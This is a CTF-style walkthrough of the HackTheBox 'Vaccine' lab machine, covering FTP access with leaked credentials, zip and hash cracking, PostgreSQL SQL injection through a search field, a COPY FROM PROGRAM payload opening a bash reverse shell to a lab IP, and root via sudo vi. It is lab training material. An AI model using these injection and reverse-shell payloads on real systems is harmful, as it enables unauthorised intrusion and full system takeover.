HackTheBox - Vaccine Writeup
Box author | MinatoTW
Enumeration
- Top 1000 ports scan
|
|
- the result
|
|
- All ports scan
|
|
- the result
|
|
- The result of both this scan
- open ports
- 21 / ftp
- 22 / SSH
- 80 / http
FTP
-
login with this credentials
ftpuser:mc@F1l3ZilL4
- this credentails found from previous machine called
oopsie
-
Found
backup.zip
file
- download the
zip file
Zip2John
- the zip file is encrypted
- Time to use
zip2john
- Direct the output from
zip2john
into file calledbackup.hash
John-The-Ripper[JtR]
- Use JtR to crack it
- found the password
Content of the ZipFile
-
Unzip and got 2 files called
index.php
style.css
-
Found the password in
index.php
- turns out, it is
md5 hash
- crack it using online tool
The Website
- Login with the password found in
index.php
file
- Assuming this is a database loaded several cars
- Try to insert
'
in the search field and got this error
SQLmap
- Here is the syntax. Sqlmap also needed cookie for this to work
|
|
- This server is using PostgreSQL database
- Sqlmap also found vulnerability can lead into injections
UNION select
Finding Columns for attack
- Finding how many columns for SQL injection attack
- By inserting this into
search field
:' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
.. and so on. - Until you’ve found an error.
Python script
- However, I’m kinda lazy. So, I made python script for it.
|
|
- the result
- By looking at this result, we’ve found 5 columns.
Finding Columns with useful data
-
Now, we just found
5 columns
-
The next payload gonna be using
UNION SELECT
-
Place string into each column.
-
This is what I’m gonna try:
' UNION SELECT 'a',NULL,NULL,NULL,NULL--
' UNION SELECT NULL,'a',NULL,NULL,NULL--
' UNION SELECT NULL,NULL,'a',NULL,NULL--
' UNION SELECT NULL,NULL,NULL,'a',NULL--
' UNION SELECT NULL,NULL,NULL,NULL,'a'--
-
Well, we’ve found an error at the first column that state:
ERROR: invalid input syntax for integer: "a" LINE 1: ...ect \* from cars where name ilike '%' UNION SELECT 'a',NULL,N...
Conversion failed when converting the varchar value 'a' to data type int.
- The rest of it. Work Fine
Foothold/Gaining Access
The Version of database
- Let’s get the database version by inserting this in search field:
' UNION SELECT NULL,VERSION(),NULL,NULL,NULL--
- The result
Exploit
-
I found this article
-
Authenticated Arbitrary Command Execution on PostgreSQL 9.3 > Latest
-
Let’s try exploit it.
-
by inserting this:
';DROP TABLE IF EXISTS cmd_exec;--
';CREATE TABLE cmd_exec(cmd_output text);--
';COPY cmd_exec FROM PROGRAM 'bash -c "bash -i >& /dev/tcp/10.10.16.86/9901 0>&1";'--
Reverse Shell
- Got the reverse shell
- Found ssh key
SSH
- Copy the key and change the permission with
chmod 600
- ssh into it
- Let’s take a look at the website folder
/var/www/html
- we’ve found a lot of files
- First, lets check if there any user on it by using
grep
-
Found 2 user exist:
admin
postgres
-
However, postgres user have it’s own password.
-
Now, we’ve got the password. Let’s try check the sudo permission on it by typing
sudo -l
Privilege Escalation
- Interesting, this user can run
vi
as sudo on specific file - Let’s execute it by open the file with full path
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
- now, press
esc
and type:!/bin/sh
- press
return
- Source - sudo vi GTFOBins
Root
- Now, I’m root
- Found the root flag
Conclusion
I’ve learned a lot today. Make sure to configure the database properly and please update it. Use, long and complicate passwords. DO NOT mix around with the user command
and the root command
.
I have a fun time doing this machine and I hope you guys do too. Bye ;)